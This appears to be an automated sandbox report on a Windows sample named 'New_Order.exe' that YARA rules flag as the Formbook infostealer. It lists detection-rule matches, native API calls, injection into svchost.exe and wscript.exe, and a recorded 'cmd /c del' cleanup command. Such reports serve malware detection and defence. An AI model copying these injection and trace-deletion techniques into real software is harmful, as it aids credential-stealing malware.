Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: New_Order.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004181C0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418270 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004182F0 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004181BA NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004182EA NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041839B NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039695D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969B00 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A10 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039699D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969950 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039698A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969820 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396B040 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969770 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A770 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969760 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039696D0 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969650 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039695F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969560 NtWriteFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AB040 NtSuspendThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9560 NtWriteFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A10 NtQuerySection
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A20 NtResumeThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9760 NtOpenProcess
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA770 NtOpenThread
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006281C0 NtCreateFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00628270 NtReadFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006282F0 NtClose
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006283A0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006281BA NtCreateFile
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006282EA NtClose
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062839B NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00406945
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040711C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041BA5D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041C34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041B4A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EBB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E03DA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EDBD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0394AB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F22AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DFA2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392F900
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393B090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F20A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F28EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E1002
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FE824
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FDFCE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F1FF1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2EF7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ED616
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03946E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F25DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2D07
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03920D20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F1D55
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393841F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ED466
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487B090
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049320A8
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04921002
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487841F
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486F900
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932D07
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04860D20
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04931D55
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049322AE
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932EF7
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04886E30
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489EBB0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04931FF1
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932B28
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062BA5D
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062C34C
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00618C60
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062B4A3
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00612D90
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00612FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B150 appears 48 times
Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0486B150 appears 35 times
Source: New_Order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs New_Order.exe
Source: New_Order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@13/8
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Users\user\Desktop\New_Order.exe | File created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmp
Source: New_Order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\New_Order.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\New_Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: New_Order.exe | Virustotal: Detection: 38%
Source: New_Order.exe | ReversingLabs: Detection: 59%
Source: C:\Users\user\Desktop\New_Order.exe | File read: C:\Users\user\Desktop\New_Order.exe
Source: unknown | Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Users\user\Desktop\New_Order.exe | Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'Jump to behavior
          Source: C:\Users\user\Desktop\New_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: New_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410109 push eax; iretd 1_2_0041010B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A2F2 push es; ret 1_2_0041A337
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00415BFC push ss; ret 1_2_00415BFD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B46C push eax; ret 1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B402 push eax; ret 1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B40B push eax; ret 1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004154D4 push ss; iretd 1_2_004154DC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413E26 pushfd ; iretd 1_2_00413E27
